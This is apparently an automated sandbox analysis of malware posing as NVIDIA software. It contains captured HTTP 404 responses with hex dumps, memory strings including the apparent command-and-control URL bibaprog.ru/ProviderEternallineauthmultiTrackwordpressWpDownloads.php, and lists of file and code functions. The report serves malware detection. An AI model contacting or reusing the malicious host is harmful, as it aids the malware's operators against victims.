3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 12:39:54 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qo4ZQVYAP3x8MiYnm%2FSCsFy%2BDzyY2mrgWLJqntSZA%2BnvV%2FZvC0l9wet0Knm9r4YVyAcGoYiPQBvRZIfZBY77j%2FSOLavmeybH6EHMYiLpJadSCgLKbzWw%2BPHTO5IV4g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 901573a4b99c4414-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=8473&min_rtt=1701&rtt_var=14183&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=691&delivery_rate=26125&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 12:40:05 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=APr2lqU7VFkZCQUc%2Fee7yWvt1P3VmVd%2B9faIEMd8rBdhmzzcV4XOSrwpg%2BJFm4JVjiU%2FQ0gxzg84nVcwEAeSAnN2uf72ewTQC7ERT66jwm5XM2WDdFcURqkOaCfIpQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 901573e9fb197c6a-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=10020&min_rtt=1905&rtt_var=16944&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=691&delivery_rate=21848&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 12:40:12 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oCCqGn9HDvQOcZ5nbd3uYz%2Fopg%2FkcFT%2FKqZEn5Higo66NQQWldB%2FvvNLtMYF%2BDfTQAkA%2FqFlQye9Rjy9z0QEANI7lt5Jim3xfqyT8KevqoeqrTwjt8lnok6N%2FW4oCw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 901574149ab34414-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=3487&min_rtt=1749&rtt_var=4133&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=691&delivery_rate=93231&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 12:40:23 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6YmI6cNhDLj3T69PntJ6dYFC9zeSQY6d8XNSjPjV4oa0hTkbflWYzHqwyJHxj8zItutf%2FxTrOeB2H666lSPYDmOx6E1PUu1LXKOgd1129jeYZnMeafHEt92RvfQ5Nw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9015745929ad42e9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=4653&min_rtt=1725&rtt_var=6503&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=674&delivery_rate=58047&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 12:40:34 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UOCQeiDFF%2BSlQHkxsRsTMVMsqexuK2JWNt69h04yRXISCBPSov%2F4%2B9OsUXZ7c%2F7J4Rdon%2FlU4BgXpZvUSdQ4mj8S5CkY%2FtwmmywLU1b2YRNV2RGEKow%2FP63qnvyt4g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9015749dea638ca1-EWRalt-svc: h2=":443"; ma=60server-timing: cfL4;desc="?proto=TCP&rtt=3137&min_rtt=1947&rtt_var=3110&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=638&delivery_rate=127299&cwnd=167&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 12:40:45 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4dr8GGqLOcodGl6LM5ZUhxyf2u8u3MmwpMmsC8yelzQct8Y5JCzCHQMRmtp2hYh%2BckF0ydhEmoUYhdW4%2BcAwujCZAHzKNvnHQJVFjnkkeSP8tZrgwCgVr6YxsCDNrg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 901574e3cac48ca1-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=9847&min_rtt=1911&rtt_var=16589&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=691&delivery_rate=22324&cwnd=167&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 12:40:56 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SKeu3gXIji3cbwW5w57ipMDpjDL%2B126SQzBManIMcKQ1d5QBIbyzHYWxyqu3m%2B6878TUubCLfOVUoIwtnXCnDvjUgHpP5UAlKt92Owyl%2FUKmKHsUi8GeZVYxSJmxkw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9015752aacab42e9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=4514&min_rtt=1702&rtt_var=6262&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=674&delivery_rate=60333&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 12:41:07 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-alivecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ae7YIM97bDDZZ0c2gicRSD31Ijtk8Y08Hedyl%2Bo3%2B5l9DzX0bYx7B02CbASv%2F6qWSdYM%2FRaPd30t2W5I3wLNaFraKSj45IqZ%2B%2BV1hDIcw42TX6ZGNwnxTzdYwXo%2Fdw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9015756f8ef642e9-EWRalt-svc: h2=":443"; ma=60server-timing: cfL4;desc="?proto=TCP&rtt=4221&min_rtt=1837&rtt_var=5458&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=638&delivery_rate=69803&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                                  Source: hBoBqOIwjXsCbkOMEKwZ.exe, 0000000C.00000002.2162868162.000000000302D000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000000C.00000002.2162868162.0000000002EA3000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000015.00000002.2283723640.0000000003115000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000015.00000002.2283723640.0000000002F4E000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000001A.00000002.2360881522.0000000002B45000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000001A.00000002.2360881522.000000000297F000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000001F.00000002.2482827298.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000001F.00000002.2482827298.0000000002B8C000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000025.00000002.2561253706.000000000291C000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000025.00000002.2561253706.0000000002AE1000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000002A.00000002.2689257376.0000000003781000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000002A.00000002.2689257376.000000000398E000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000002F.00000002.2773299030.0000000002F13000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000002F.00000002.2773299030.0000000003121000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000034.00000002.2851286841.000000000314B000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000034.00000002.2851286841.0000000002F8E000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000039.00000002.2975068595.0000000002E9B000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000039.00000002.2975068595.0000000002C8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bibaprog.ru
                                  Source: hBoBqOIwjXsCbkOMEKwZ.exe, 00000039.00000002.2975068595.0000000002C8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bibaprog.ru/
                                  Source: hBoBqOIwjXsCbkOMEKwZ.exe, 0000000C.00000002.2162868162.0000000002EA3000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000015.00000002.2283723640.0000000002F4E000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000001A.00000002.2360881522.000000000297F000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000001F.00000002.2482827298.0000000002B8C000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000025.00000002.2561253706.000000000291C000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000002A.00000002.2689257376.0000000003781000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000002F.00000002.2773299030.0000000002F13000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000034.00000002.2851286841.0000000002F8E000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000039.00000002.2975068595.0000000002C8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://bibaprog.ru/ProviderEternallineauthmultiTrackwordpressWpDownloads.php
                                  Source: NVIDIA Container.exe, 00000005.00000002.2111607409.00000000038E7000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000000C.00000002.2162868162.0000000002EA3000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000015.00000002.2283723640.0000000002F4E000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000001A.00000002.2360881522.000000000297F000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000001F.00000002.2482827298.0000000002B8C000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000025.00000002.2561253706.000000000291C000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000002A.00000002.2689257376.0000000003781000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 0000002F.00000002.2773299030.0000000002F13000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000034.00000002.2851286841.0000000002F8E000.00000004.00000800.00020000.00000000.sdmp, hBoBqOIwjXsCbkOMEKwZ.exe, 00000039.00000002.2975068595.0000000002C8D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

                                  System Summary

                                  barindex
                                  Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeCode function: 0_2_01006FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_01006FAA
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeCode function: 0_2_0100848E0_2_0100848E
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeCode function: 0_2_010171530_2_01017153
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeCode function: 0_2_010251C90_2_010251C9
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeCode function: 0_2_010140880_2_01014088
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeCode function: 0_2_010100B70_2_010100B7
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeCode function: 0_2_010040FE0_2_010040FE
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeCode function: 0_2_010143BF0_2_010143BF
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeCode function: 0_2_010162CA0_2_010162CA
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeCode function: 0_2_010032F70_2_010032F7
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeCode function: 0_2_0100C4260_2_0100C426
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeCode function: 0_2_0102D4400_2_0102D440
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeCode function: 0_2_0100F4610_2_0100F461
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeCode function: 0_2_010177EF0_2_010177EF
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeCode function: 0_2_0100E9B70_2_0100E9B7
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeCode function: 0_2_010319F40_2_010319F4
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeCode function: 0_2_0100286B0_2_0100286B
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeCode function: 0_2_0102D8EE0_2_0102D8EE
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeCode function: 0_2_01016CDC0_2_01016CDC
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeCode function: 0_2_01024F9A0_2_01024F9A
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeCode function: 0_2_0100EFE20_2_0100EFE2
                                  Source: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exeCode function: 0_2_01013E0B0_2_01013E0B
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeCode function: 5_2_00007FF848F10DAC5_2_00007FF848F10DAC
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeCode function: 5_2_00007FF8490C62F55_2_00007FF8490C62F5
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeCode function: 5_2_00007FF8490C63355_2_00007FF8490C6335
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeCode function: 5_2_00007FF84916062B5_2_00007FF84916062B
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeCode function: 5_2_00007FF8491605A45_2_00007FF8491605A4
                                  Source: C:\Users\user\AppData\Roaming\NVIDIA\NVIDIA Container.exeCode function: 5_2_00007FF84916057B5_2_00007FF84916057B
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 12_2_00007FF848F6A46912_2_00007FF848F6A469
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 12_2_00007FF848F5A4C412_2_00007FF848F5A4C4
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 12_2_00007FF848F6502912_2_00007FF848F65029
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 12_2_00007FF848F10DAC12_2_00007FF848F10DAC
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 12_2_00007FF848F277F812_2_00007FF848F277F8
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 12_2_00007FF848F1F54312_2_00007FF848F1F543
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 12_2_00007FF848F2B6BD12_2_00007FF848F2B6BD
                                  Source: C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exeCode function: 12_2_00007FF848F2CE3212_2_00007FF848F2CE32
